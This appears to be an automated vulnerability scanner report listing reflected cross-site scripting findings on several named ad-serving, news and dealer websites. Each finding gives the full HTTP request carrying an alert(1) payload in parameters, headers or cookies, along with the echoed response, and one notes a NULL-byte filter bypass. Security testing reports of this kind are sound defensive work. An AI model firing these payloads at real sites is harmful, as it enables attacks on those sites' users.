Summary
Severity: High
Confidence: Certain
Host: http://www4.smartadserver.com
Path: /a/diff/436/1053353/show0.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d523'-alert(1)-'f79aa0fec9c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a/diff/436/1053353/show0.asp?1053353;167347;7653005851078549651;[timestamp];M&1d523'-alert(1)-'f79aa0fec9c=1 HTTP/1.1
Host: www4.smartadserver.com
Proxy-Connection: keep-alive
Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea66d80addda
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDASRQTARR=MIMJFGBBJGPNPIBEPHNJMALE; BIGipServerSMART2=1376191242.23040.0000; TestIfCookie=ok; TestIfCookieP=ok; pbwmaj5=y; pbw=%24b%3D16999%3B%24o%3D11061%3B%24sh%3D6%3B%24sw%3D6; pid=7653005851078549651; pdomid=4
Response
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 23 Apr 2011 17:43:06 GMT
Content-Length: 363
2.97. http://www4.smartadserver.com/a/diff/436/1053353/show0.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www4.smartadserver.com
Path: /a/diff/436/1053353/show0.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9652a<script>alert(1)</script>43ca9da9cf3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /a/diff/436/1053353/show0.asp?1053353;167347;7653005851078549651;%5btimestamp%5d;M&9652a<script>alert(1)</script>43ca9da9cf3=1 HTTP/1.1
Host: www4.smartadserver.com
Proxy-Connection: keep-alive
Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea66d80addda
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDASRQTARR=MIMJFGBBJGPNPIBEPHNJMALE; BIGipServerSMART2=1376191242.23040.0000; pdomid=4; pbw=%24b%3D16999%3B%24o%3D11061%3B%24c%3D42%3B; pid=7653005851078549651; TestIfCookie=ok; TestIfCookieP=ok
Response
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 23 Apr 2011 17:41:39 GMT
Content-Length: 548
if (screen.width && screen.height) {var jsinfocall=new Image;jsinfocall.src='http://www4.smartadserver.com/a/track/jsinfo.asp?sw='+screen.width+'&sh='+screen.height;}
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8692'-alert(1)-'f007626cf8e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /call/adj/167347d8692'-alert(1)-'f007626cf8e/1053353/muzik.vidivodo.com.UM_Turkey/1x1/[timestamp]/no?[countgo] HTTP/1.1
Host: www4.smartadserver.com
Proxy-Connection: keep-alive
Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea66d80addda
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDASRQTARR=MIMJFGBBJGPNPIBEPHNJMALE; BIGipServerSMART2=1376191242.23040.0000; pdomid=4; pid=7653005851078549651; TestIfCookie=ok; TestIfCookieP=ok; pbwmaj5=y; pbw=%24b%3D16999%3B%24o%3D11061%3B%24sh%3D6%3B%24sw%3D6
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 23 Apr 2011 17:50:17 GMT
Content-Length: 360
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20d85'-alert(1)-'9595c27d68e was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /call/adj/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/[timestamp]20d85'-alert(1)-'9595c27d68e/no?[countgo] HTTP/1.1
Host: www4.smartadserver.com
Proxy-Connection: keep-alive
Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea66d80addda
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDASRQTARR=MIMJFGBBJGPNPIBEPHNJMALE; BIGipServerSMART2=1376191242.23040.0000; pdomid=4; pid=7653005851078549651; TestIfCookie=ok; TestIfCookieP=ok; pbwmaj5=y; pbw=%24b%3D16999%3B%24o%3D11061%3B%24sh%3D6%3B%24sw%3D6
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 23 Apr 2011 17:54:12 GMT
Content-Length: 360
The value of the [countgo] request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7adb'%3balert(1)//9c59d422aa1 was submitted in the [countgo] parameter. This input was echoed as b7adb';alert(1)//9c59d422aa1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /call/adj/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/[timestamp]/no?[countgo]b7adb'%3balert(1)//9c59d422aa1 HTTP/1.1
Host: www4.smartadserver.com
Proxy-Connection: keep-alive
Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea66d80addda
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: ASPSESSIONIDQQDCCDAR=NLMKNGDBDAAJEJEPCMNIIBEE; path=/
Date: Sat, 23 Apr 2011 17:37:25 GMT
Set-Cookie: BIGipServerSMART2=1678181130.20480.0000; path=/
Content-Length: 355
2.101. http://www4.smartadserver.com/call/adj/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/[timestamp]/no [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 353ce'%3balert(1)//ef8e1dee706 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 353ce';alert(1)//ef8e1dee706 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /call/adj/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/[timestamp]/no?[countgo]&353ce'%3balert(1)//ef8e1dee706=1 HTTP/1.1
Host: www4.smartadserver.com
Proxy-Connection: keep-alive
Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea66d80addda
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: ASPSESSIONIDCAQBRTDS=CCHIPEABOMHDBGNJMOFPFFCD; path=/
Date: Sat, 23 Apr 2011 17:38:52 GMT
Set-Cookie: BIGipServerSMART2=1325859594.23040.0000; path=/
Content-Length: 358
The value of the [countgo] request parameter is copied into the HTML document as plain text between tags. The payload 1e510<script>alert(1)</script>45afb62f8ad was submitted in the [countgo] parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /call/adjnc/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/%5Btimestamp%5D/no?[countgo]1e510<script>alert(1)</script>45afb62f8ad HTTP/1.1
Host: www4.smartadserver.com
Proxy-Connection: keep-alive
Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea66d80addda
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TestIfCookieP=ok; TestIfCookie=ok; ASPSESSIONIDASRQTARR=MIMJFGBBJGPNPIBEPHNJMALE; BIGipServerSMART2=1376191242.23040.0000
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 23 Apr 2011 17:37:18 GMT
Content-Length: 554
if (screen.width && screen.height) {var jsinfocall=new Image;jsinfocall.src='http://www4.smartadserver.com/a/track/jsinfo.asp?sw='+screen.width+'&sh='+screen.height;}
2.103. http://www4.smartadserver.com/call/adjnc/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/%5Btimestamp%5D/no [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4a6bc<script>alert(1)</script>7ab968a4c2a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /call/adjnc/167347/1053353/muzik.vidivodo.com.UM_Turkey/1x1/%5Btimestamp%5D/no?[countgo]&4a6bc<script>alert(1)</script>7ab968a4c2a=1 HTTP/1.1
Host: www4.smartadserver.com
Proxy-Connection: keep-alive
Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea66d80addda
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TestIfCookieP=ok; TestIfCookie=ok; ASPSESSIONIDASRQTARR=MIMJFGBBJGPNPIBEPHNJMALE; BIGipServerSMART2=1376191242.23040.0000
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/x-javascript
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 23 Apr 2011 17:42:21 GMT
Content-Length: 557
if (screen.width && screen.height) {var jsinfocall=new Image;jsinfocall.src='http://www4.smartadserver.com/a/track/jsinfo.asp?sw='+screen.width+'&sh='+screen.height;}
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00e289a"-alert(1)-"81fc8afb6e1 was submitted in the User-Agent HTTP header. This input was echoed as e289a"-alert(1)-"81fc8afb6e1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /news/security/attacks/229402094 HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16%00e289a"-alert(1)-"81fc8afb6e1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41842"><script>alert(1)</script>4b6f05419af was submitted in the Referer HTTP header. This input was echoed as 41842\"><script>alert(1)</script>4b6f05419af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /identity_theft_protection_services/index.php?a=2&kw=gid9a+identity%20theft%20resource&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=41842"><script>alert(1)</script>4b6f05419af
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d90a'-alert(1)-'ff7f2bdc6e0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /used/Volkswagen/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm HTTP/1.1
Host: www.volkswagensouthburlington.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=3d90a'-alert(1)-'ff7f2bdc6e0
Response
HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Vary: Accept-Encoding
Date: Sat, 23 Apr 2011 15:54:13 GMT
Connection: close
Set-Cookie: ssoid=8310f0e90a0a006e00d46b954045410c;path=/
Set-Cookie: JSESSIONID=3ia0vdueobjf5;path=/
Set-Cookie: ddcpoolid=CmsPoolG;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 74136
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eff1a"><script>alert(1)</script>95b497433a1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /used/Volkswagen/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm HTTP/1.1
Host: www.volkswagensouthburlington.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=eff1a"><script>alert(1)</script>95b497433a1
Response
HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Vary: Accept-Encoding
Date: Sat, 23 Apr 2011 15:54:11 GMT
Connection: close
Set-Cookie: ssoid=8310e6320a0a006e00d46b957ebc568a;path=/
Set-Cookie: JSESSIONID=re5c5k752csh;path=/
Set-Cookie: ddcpoolid=CmsPoolG;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 74166
<title>Used 2010 Volkswagen Jetta Sportwagen S For Sale in South Burlington VT | VW Dealers Ver ...[SNIP]... <img src="http://hits.dealer.com/clear.gif?&4=0&5=0&10=http://www.google.com/search?hl=en&q=eff1a"><script>alert(1)</script>95b497433a1&20=www.volkswagensouthburlington.com&21=/used/Volkswagen/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm&50=8310e6320a0a006e00d46b957ebc568a&51=&52=&53=&a ...[SNIP]...
The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b12e0"%3balert(1)//bfb8dac7af7 was submitted in the cli cookie. This input was echoed as b12e0";alert(1)//bfb8dac7af7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/iblocal.rubiconmcclatchy.ron/audience;sz=300x250;net=iblocal;ord=4049553634;ord1=908824;cmpgurl=http%253A//www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989eb12e0"%3balert(1)//bfb8dac7af7; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; targ=1; brlg=1; dc=dc
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 03:11:04 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Mon, 25-Apr-2011 03:11:04 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sun, 24-Apr-2011 11:11:04 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Mon, 25-Apr-2011 03:11:04 GMT
Content-Length: 7706
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... </scr'+'ipt>');CollectiveMedia.addPixel("http://ib.adnxs.com/mapuid?member=311&user=11f8f328940989eb12e0";alert(1)//bfb8dac7af7&seg_code=noseg&ord=1303614664",true);CollectiveMedia.addPixel("http://tags.bluekai.com/site/2731",false);CollectiveMedia.addPixel("http://pixel.quantserve.com/seg/r;a=p-86ZJnSph3DaTI;rand=187524340;re ...[SNIP]...
The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 83651<script>alert(1)</script>1021085a0ae was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 69437<script>alert(1)</script>6795e865c60 was submitted in the UID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p91300630 cookie is copied into the HTML document as plain text between tags. The payload 83bdf<script>alert(1)</script>98406144f62 was submitted in the ar_p91300630 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 1d12e<script>alert(1)</script>f044f07ba60 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the UID cookie is copied into the HTML document as plain text between tags. The payload c8242<script>alert(1)</script>3748b3af4f8 was submitted in the UID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ar_p91300630 cookie is copied into the HTML document as plain text between tags. The payload a63c0<script>alert(1)</script>e755c95c29a was submitted in the ar_p91300630 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7a27"-alert(1)-"704419ea05 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
